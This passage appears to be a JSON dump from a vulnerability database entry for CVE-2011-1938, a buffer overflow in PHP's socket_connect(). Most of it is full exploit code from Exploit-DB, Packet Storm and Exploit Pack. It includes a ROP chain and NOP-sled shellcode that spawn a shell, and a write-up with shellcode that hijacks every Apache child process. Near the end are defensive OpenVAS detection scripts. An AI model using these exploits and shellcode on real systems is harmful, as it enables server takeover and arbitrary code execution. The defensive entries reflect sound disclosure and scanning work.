INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INT_80; // int $0x80\n\n$evil = $padd.$payload;\n\n$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);\n$ret = socket_connect($fd, $evil);\n?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:40", "description": "\nPHP 5.3.5 - socket_connect() Local Buffer Overflow", "edition": 1, "published": "2011-05-25T00:00:00", "title": "PHP 5.3.5 - socket_connect() Local Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-05-25T00:00:00", "id": "EXPLOITPACK:E01EEEA67E34582F2A422D4CD1795D05", "href": "", "sourceData": "<?php\n// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian \n// Affected Versions: 5.3.3-5.3.6 \n\necho \"[+] CVE-2011-1938\";\necho \"[+] there we go...\\n\";\ndefine('EVIL_SPACE_ADDR', \"\\xff\\xff\\xee\\xb3\");\ndefine('EVIL_SPACE_SIZE', 1024*1024*8);\n$SHELLCODE = \n \"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\".\n \"\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\".\n \"\\xcd\\x80\";\necho \"[+] creating the sled.\\n\";\n\n$CODE = str_repeat(\"\\x90\", EVIL_SPACE_SIZE);\nfor ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;\n $i < strlen($SHELLCODE) ; $i++, $j++) {\n$CODE[$j] = $SHELLCODE[$i];\n}\n\n$b = str_repeat(\"A\", 196).EVIL_SPACE_ADDR;\n$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);\necho \"[+] popping shell, have fun (if you picked the right address...)\\n\";\n$var85 = socket_connect($var79,$b);\n?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T07:57:46", "description": "PHP 5.3.6 - Buffer Overflow PoC (ROP). CVE-2011-1938. Local exploits for multiple platform", "published": "2011-07-04T00:00:00", "type": "exploitdb", "title": "PHP 5.3.6 - Buffer Overflow PoC ROP", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-07-04T00:00:00", "id": "EDB-ID:17486", "href": "https://www.exploit-db.com/exploits/17486/", "sourceData": "<?php\r\n/*\r\n** Jonathan Salwan - @jonathansalwan\r\n** http://shell-storm.org\r\n** 2011-06-04\r\n**\r\n** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\r\n**\r\n** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c\r\n** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary\r\n** code via a long pathname for a UNIX socket.\r\n*/\r\n\r\necho \"[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\\n\";\r\necho \"[+] CVE-2011-1938\\n\\n\";\r\n\r\n# Gadgets in /usr/bin/php\r\ndefine('DUMMY', \"\\x42\\x42\\x42\\x42\"); // padding\r\ndefine('STACK', \"\\x20\\xba\\x74\\x08\"); // .data 0x46a0 0x874ba20\r\ndefine('STACK4', \"\\x24\\xba\\x74\\x08\"); // STACK + 4\r\ndefine('STACK8', \"\\x28\\xba\\x74\\x08\"); // STACK + 8\r\ndefine('STACK12', \"\\x3c\\xba\\x74\\x08\"); // STACK + 12\r\ndefine('INT_80', \"\\x27\\xb6\\x07\\x08\"); // 0x0807b627: int $0x80\r\ndefine('INC_EAX', \"\\x66\\x50\\x0f\\x08\"); // 0x080f5066: inc %eax | ret\r\ndefine('XOR_EAX', \"\\x60\\xb4\\x09\\x08\"); // 0x0809b460: xor %eax,%eax | ret\r\ndefine('MOV_A_D', \"\\x84\\x3e\\x12\\x08\"); // 0x08123e84: mov %eax,(%edx) | ret\r\ndefine('POP_EBP', \"\\xc7\\x48\\x06\\x08\"); // 0x080648c7: pop %ebp | ret\r\ndefine('MOV_B_A', \"\\x18\\x45\\x06\\x08\"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('MOV_DI_DX', \"\\x20\\x26\\x07\\x08\"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('POP_EDI', \"\\x23\\x26\\x07\\x08\"); // 0x08072623: pop %edi | pop %ebp | ret\r\ndefine('POP_EBX', \"\\x0f\\x4d\\x21\\x08\"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('XOR_ECX', \"\\xe3\\x3b\\x1f\\x08\"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret\r\n\r\n$padd = str_repeat(\"A\", 196);\r\n\r\n$payload = POP_EDI. // pop %edi\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n \"//bi\". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK4. // 0x874ba24\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n \"n/sh\". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK8. // 0x874ba28\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n MOV_A_D. // mov %eax,(%edx)\r\n XOR_ECX. // xor %ecx,%ecx\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n POP_EBX. // pop %ebx\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INT_80; // int $0x80\r\n\r\n$evil = $padd.$payload;\r\n\r\n$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\n$ret = socket_connect($fd, $evil);\r\n?>\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17486/"}, {"lastseen": "2016-02-02T07:37:30", "description": "PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability. CVE-2011-1938. Local exploits for multiple platform", "published": "2011-05-25T00:00:00", "type": "exploitdb", "title": "PHP <= 5.3.5 socket_connect Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-05-25T00:00:00", "id": "EDB-ID:17318", "href": "https://www.exploit-db.com/exploits/17318/", "sourceData": "<?php\r\n// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian \r\n// Affected Versions: 5.3.3-5.3.6 \r\n\r\necho \"[+] CVE-2011-1938\";\r\necho \"[+] there we go...\\n\";\r\ndefine('EVIL_SPACE_ADDR', \"\\xff\\xff\\xee\\xb3\");\r\ndefine('EVIL_SPACE_SIZE', 1024*1024*8);\r\n$SHELLCODE = \r\n \"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\".\r\n \"\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\".\r\n \"\\xcd\\x80\";\r\necho \"[+] creating the sled.\\n\";\r\n\r\n$CODE = str_repeat(\"\\x90\", EVIL_SPACE_SIZE);\r\nfor ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;\r\n $i < strlen($SHELLCODE) ; $i++, $j++) {\r\n$CODE[$j] = $SHELLCODE[$i];\r\n}\r\n\r\n$b = str_repeat(\"A\", 196).EVIL_SPACE_ADDR;\r\n$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\necho \"[+] popping shell, have fun (if you picked the right address...)\\n\";\r\n$var85 = socket_connect($var79,$b);\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17318/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:54", "description": "", "published": "2011-07-03T00:00:00", "type": "packetstorm", "title": "PHP 5.3.6 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-07-03T00:00:00", "id": "PACKETSTORM:102751", "href": "https://packetstormsecurity.com/files/102751/PHP-5.3.6-Buffer-Overflow.html", "sourceData": "`<?php \n/* \n** Jonathan Salwan - @shell_storm \n** http://shell-storm.org \n** 2011-06-04 \n** \n** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 \n** \n** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c \n** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary \n** code via a long pathname for a UNIX socket. \n*/ \n \necho \"[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\\n\"; \necho \"[+] CVE-2011-1938\\n\\n\"; \n \n# Gadgets in /usr/bin/php \ndefine('DUMMY', \"\\x42\\x42\\x42\\x42\"); // padding \ndefine('STACK', \"\\x20\\xba\\x74\\x08\"); // .data 0x46a0 0x874ba20 \ndefine('STACK4', \"\\x24\\xba\\x74\\x08\"); // STACK + 4 \ndefine('STACK8', \"\\x28\\xba\\x74\\x08\"); // STACK + 8 \ndefine('STACK12', \"\\x3c\\xba\\x74\\x08\"); // STACK + 12 \ndefine('INT_80', \"\\x27\\xb6\\x07\\x08\"); // 0x0807b627: int $0x80 \ndefine('INC_EAX', \"\\x66\\x50\\x0f\\x08\"); // 0x080f5066: inc %eax | ret \ndefine('XOR_EAX', \"\\x60\\xb4\\x09\\x08\"); // 0x0809b460: xor %eax,%eax | ret \ndefine('MOV_A_D', \"\\x84\\x3e\\x12\\x08\"); // 0x08123e84: mov %eax,(%edx) | ret \ndefine('POP_EBP', \"\\xc7\\x48\\x06\\x08\"); // 0x080648c7: pop %ebp | ret \ndefine('MOV_B_A', \"\\x18\\x45\\x06\\x08\"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret \ndefine('MOV_DI_DX', \"\\x20\\x26\\x07\\x08\"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret \ndefine('POP_EDI', \"\\x23\\x26\\x07\\x08\"); // 0x08072623: pop %edi | pop %ebp | ret \ndefine('POP_EBX', \"\\x0f\\x4d\\x21\\x08\"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret \ndefine('XOR_ECX', \"\\xe3\\x3b\\x1f\\x08\"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret \n \n$padd = str_repeat(\"A\", 196); \n \n$payload = POP_EDI. // pop %edi \nSTACK. // 0x874ba20 \nDUMMY. // pop %ebp \nMOV_DI_DX. // mov %edi,%edx \nDUMMY. // pop %esi \nDUMMY. // pop %edi \n\"//bi\". // pop %ebp \nMOV_B_A. // mov %ebp,%eax \nDUMMY. // pop %ebx \nDUMMY. // pop %esi \nDUMMY. // pop %edi \nDUMMY. // pop %ebp \nMOV_A_D. // mov %eax,(%edx) \nPOP_EDI. // pop %edi \nSTACK4. // 0x874ba24 \nDUMMY. // pop %ebp \nMOV_DI_DX. // mov %edi,%edx \nDUMMY. // pop %esi \nDUMMY. // pop %edi \n\"n/sh\". // pop %ebp \nMOV_B_A. // mov %ebp,%eax \nDUMMY. // pop %ebx \nDUMMY. // pop %esi \nDUMMY. // pop %edi \nDUMMY. // pop %ebp \nMOV_A_D. // mov %eax,(%edx) \nPOP_EDI. // pop %edi \nSTACK8. // 0x874ba28 \nDUMMY. // pop %ebp \nMOV_DI_DX. // mov %edi,%edx \nDUMMY. // pop %esi \nDUMMY. // pop %edi \nDUMMY. // pop %ebp \nXOR_EAX. // xor %eax,%eax \nMOV_A_D. // mov %eax,(%edx) \nXOR_ECX. // xor %ecx,%ecx \nDUMMY. // pop %ebx \nDUMMY. // pop %esi \nDUMMY. // pop %edi \nDUMMY. // pop %ebp \nPOP_EBX. // pop %ebx \nSTACK. // 0x874ba20 \nDUMMY. // pop %esi \nDUMMY. // pop %edi \nDUMMY. // pop %ebp \nXOR_EAX. // xor %eax,%eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINC_EAX. // inc %eax \nINT_80; // int $0x80 \n \n$evil = $padd.$payload; \n \n$fd = socket_create(AF_UNIX, SOCK_STREAM, 1); \n$ret = socket_connect($fd, $evil); \n?> \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102751/php536-overflow.txt"}, {"lastseen": "2016-12-05T22:18:53", "description": "", "published": "2011-05-25T00:00:00", "type": "packetstorm", "title": "PHP Socket connect() Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-05-25T00:00:00", "id": "PACKETSTORM:101665", "href": "https://packetstormsecurity.com/files/101665/PHP-Socket-connect-Stack-Buffer-Overflow.html", "sourceData": "`Hi there, \n \nThis is a quick writeup about some fun with apache based on CVE-2011-1938 \nthat was disclosed yesterday. While the first POC was literally just a \ntrivial POC - the second one was written for self-educational purposes (we \nleared quite a lot which is the most important thing) and we hope it might \nbe useful for some other vulnerabilities of this/similar type. \n \nThis is an old fashioned stack buffer overflow in the socket module, \nproblem occurs in the socket_connect. It uses memcpy to copy path from addr \nto s_un without checking addr length in case when AF_UNIX socket is used. \n \nPOC popping a shell: \n-- cut -- \n<?php \necho \"[+] CVE-2011-1938\"; \necho \"[+] there we go...\\n\"; \ndefine('EVIL_SPACE_ADDR', \"\\xff\\xff\\xee\\xb3\"); \ndefine('EVIL_SPACE_SIZE', 1024*1024*8); \n$SHELLCODE = \n\"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\". \n\"\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\". \n\"\\xcd\\x80\"; \necho \"[+] creating the sled.\\n\"; \n \n$CODE = str_repeat(\"\\x90\", EVIL_SPACE_SIZE); \nfor ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; \n$i < strlen($SHELLCODE) ; $i++, $j++) { \n$CODE[$j] = $SHELLCODE[$i]; \n} \n \n$b = str_repeat(\"A\", 196).EVIL_SPACE_ADDR; \n$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); \necho \"[+] popping shell, have fun (if you picked the right address...)\\n\"; \n$var85 = socket_connect($var79,$b); \n?> \n-- cut -- \n \n \n \nTesting POC : \n-- cut -- \ntest@Vdft02:/home/n1x0n# php ./kaka4.php \n[+] there we go... \n[+] creating the sled. \n[+] popping shell, have fun. \nPHP Warning: socket_connect(): unable to connect [22]: Invalid argument in \n/home/n1x0n/kaka4.php on line 16 \nbash-4.1# \n-- cut -- \n \n \nNow, popping a shell from a .php file that we just uploaded is quite lame \nand boring isn't (yes you can use remote connect back with RFI etc..) it ? \nInstead we decided to create a shellcode that will do something less common \nand more appropriate to this particular type of vulnerability. As we pretty \nmuch have a _full_ control over the apache child process and it's memory - \nwe can do whatever we like with it. So one of the things that we considered \nto be quite nifty was forcing apache child process to serve a page of our \nchoice. Few problems appeared at this point : how apache handles \nconnections, how to cleanly get back to apache from our shellcode, how to \nkeep our handler in memory and respond to requests etc etc... and after few \nlong nights of playing with this we managed to create a shellcode that \nsimply \"infects\" the apache child process that handled connection to our \n\"magic\" php script, and all new requests that will be handled by this child \nwill return a page of our choice. We decided to create a simple apache \nmodule, and use apache's built in functionality to generate \ncontent(av_rputs), then to use mmap2 to keep our code in memory when our \nshellcode leaves. Next step is to overwrite _hooks in apache and exit in a \nneat way by signalling the process with SIGPROF thanks to which the signal \nhandler cleans everything up behind us. So the main idea is to \"infect\" \napache child process with our own code. If we do this several times - we \ncan infect _all_ apache child processes effectively hijacking _all_ \nrequests comming into apache. \n \nThis is the result (obviously you need to guess/find few addresses due to \nASLR like av_rputs & _handle ). Other protections will prevent this from \nworking (like SSP,PIE and such). \n \n \nBEFORE (everything works as expected): \n-- cut -- \ntest@Vdft02:~# curl localhost \n<html><body><h1>It works!</h1></body></html> \ntest@Vdft02:~# curl http://localhost/this_does_not_exist \n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> \n<html><head> \n<title>404 Not Found</title> \n</head><body> \n<h1>Not Found</h1> \n<p>The requested URL /this_does_not_exist was not found on this server.</p> \n</body></html> \n-- cut -- \n \nThen we call our magic file few times, you'll see the SIGPERF signal sent \nby a shellcode (this is a good sign ;-P ) : \n \n-- cut -- \ntest@Vdft02:~# curl http://localhost/cz.php \n<br /> \n<b>Warning</b>: socket_connect() [<a \nhref='function.socket-connect'>function.socket-connect</a>]: unable to \nconnect [9]: Bad file descriptor in <b>/test/apacz/a/htdocs/cz.php</b> \non line <b>31</b><br /> \n<br /> \n<b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in \n<b>/test/apacz/a/htdocs/cz.php</b> on line <b>31</b><br /> \n-- cut -- \n \n \nThis has to be done several times so that we inject code to all child pids \n(not going to add more spam here with all these requests) : \n \nfor i in $(seq 1 512) ; do curl http://localhost/cz.php ; done \n \n \nAFTER: \n-- cut -- \ntest@Vdft02:~# curl http://localhost/ \npwned \ntest@Vdft02:~# curl http://localhost/does_not_exist \npwned \ntest@Vdft02:~# curl http://localhost/does_not_exist.php \npwned \ntest@Vdft02:~# curl http://localhost/does_not_exist.jpg \npwned \n-- cut -- \n \n \n \n \n \nAnd this is the code with the infecting shellcode. \n-- cut -- \n<?php \n \ndefine('EVIL_SPACE_ADDR', \"\\x00\\x00\\xff\\xb5\"); \ndefine('EVIL_SPACE_SIZE', 1024*1024*16); \n$SHELLCODE = \n\"\\x31\\xc9\\x31\\xd2\\x31\\xdb\\x66\\xb9\\x00\\x02\\x66\\xba\\x07\\x00\\xbe\\x22\". \n\"\\x00\\x00\\x00\\xbf\\xff\\xff\\xff\\xff\\x31\\xed\\xb8\\xc0\\x00\\x00\\x00\\xcd\". \n\"\\x80\\x89\\xc7\\x89\\xc3\\xeb\\x2d\\x5e\\xb9\\x00\\x02\\x00\\x00\\xf3\\xa4\\xb8\". \n\"\\xc0\\xc2\\x0c\\x08\\x8b\\x40\\x14\\x8b\\x40\\x10\\x89\\x18\\x31\\xc0\\x31\\xdb\". \n\"\\x31\\xc9\\x66\\xb8\\x14\\x00\\xcd\\x80\\x89\\xc3\\x66\\xb9\\x1b\\x00\\x66\\xb8\". \n\"\\x25\\x00\\xcd\\x80\\xe8\\xce\\xff\\xff\\xff\\x55\\x89\\xe5\\x8b\\x5d\\x08\\x53\". \n\"\\xeb\\x0e\\xb8\\x43\\xd3\\x06\\x08\\xff\\xd0\\x83\\xc4\\x08\\x31\\xc0\\xc9\\xc3\". \n\"\\xe8\\xed\\xff\\xff\\xff\\x70\\x77\\x6e\\x65\\x64\\x0a\\x00\"; \n \n/* allocate memory for shellcode */ \n$CODE = str_repeat(\"\\x90\", EVIL_SPACE_SIZE); \nfor ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; $i < \nstrlen($SHELLCODE) ; $i++, $j++) { \n$CODE[$j] = $SHELLCODE[$i]; \n} \n \n$b = str_repeat(EVIL_SPACE_ADDR,46); \n \n$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); \n$var85 = socket_connect($var79,$b); \n \n?> \n-- cut -- \n \n \nand above shellcode in a human readable form would be something along these \nlines: \n \n \n-- cut -- \nsection .text \n \n_start: \n \nxor ecx, ecx \nxor edx, edx \nxor ebx, ebx ; NULL \nmov cx,0x200 ; 512 bytes \nmov dx,0x7 ; PROT_READ|PROT_WRITE|PROT_EXEC \nmov esi,0x22 ; MAP_PRIVATE|MAP_ANONYMOUS \nmov edi,0xffffffff ; -1 \nxor ebp, ebp ; \nmov eax,0xc0 ; mmap() \nint 80h \nmov edi, eax \nmov ebx, eax \njmp short handler \nnext_3: \npop esi \nmov ecx, 0x200 \nrep movsb \nmov eax, 0x80cc2c0 \nmov eax, [eax+0x14] \nmov eax, [eax+0x10] \nmov [eax], ebx \n; kill(getpid(), SIGPROF) \nxor eax, eax \nxor ebx, ebx \nxor ecx, ecx \nmov ax, 20 ; getpid() \nint 80h \nmov ebx, eax ; pid \nmov cx, 27 ; SIGPROF \nmov ax, 37 ; kill() \nint 80h \n; not reached \n \nhandler: \ncall near next_3 \npush ebp \nmov ebp, esp \nmov ebx, [ebp+8] \npush ebx \njmp short pwned \nnext_2: \nmov eax, 0xb4dc0d3d \ncall eax \nadd esp, 8 \nxor eax, eax \nleave \nret \n \npwned: \ncall near next_2 \ndb \"pwned\",10,0 \n-- cut -- \n \n \nFound and exploited by: \nMateusz (shm) Kocielski, Filip (s1m0n) Palian and Marek (n1x0n) Kroemeke \n \nBest regards, \nMarek \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101665/cve20111938.txt"}], "openvas": [{"lastseen": "2019-05-29T18:39:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1938"], "description": "This host is installed with PHP and is prone to stack buffer\n overflow vulnerability.", "modified": "2018-10-20T00:00:00", "published": "2011-06-02T00:00:00", "id": "OPENVAS:1361412562310902436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902436", "type": "openvas", "title": "PHP 'socket_connect()' Buffer Overflow Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_php_bof_vuln_win.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# PHP 'socket_connect()' Buffer Overflow Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902436\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_cve_id(\"CVE-2011-1938\");\n script_bugtraq_id(47950);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"PHP 'socket_connect()' Buffer Overflow Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"os_detection.nasl\", \"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/May/472\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/101665/cve20111938.txt\");\n script_xref(name:\"URL\", value:\"http://www.bugsearch.net/en/11873/php-535-socketconnect-buffer-overflow-vulnerability-cve-2011-1938.html?ref=3\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute\n arbitrary code or to cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"PHP Version 5.3.5 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in the 'socket_connect()' function\n within socket module. It uses memcpy to copy path from addr to s_un without\n checking addr length in case when AF_UNIX socket is used.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 5.3.7 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone to stack buffer\n overflow vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://php.net/downloads.php\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less_equal(version:phpVer, test_version:\"5.3.5\")){\n report = report_fixed_ver(installed_version:phpVer, fixed_version:\"5.3.7\");\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:13:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-25T00:00:00", "published": "2011-09-21T00:00:00", "id": "OPENVAS:70257", "href": "http://plugins.openvas.org/nasl.php?oid=70257", "type": "openvas", "title": "FreeBSD Ports: php5, php5-sockets", "sourceData": "#\n#VID 057bf770-cac4-11e0-aea3-00215c6a37bb\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 057bf770-cac4-11e0-aea3-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n php5\n php5-sockets\n\nCVE-2011-2483\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, does not properly handle 8-bit characters, which makes it\neasier for context-dependent attackers to determine a cleartext\npassword by leveraging knowledge of a password hash.\n\nCVE-2011-2202\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\nCVE-2011-1938\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket.\n\nCVE-2011-1148\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\nif(description)\n{\n script_id(70257);\n script_version(\"$Revision: 5424 $\");\n 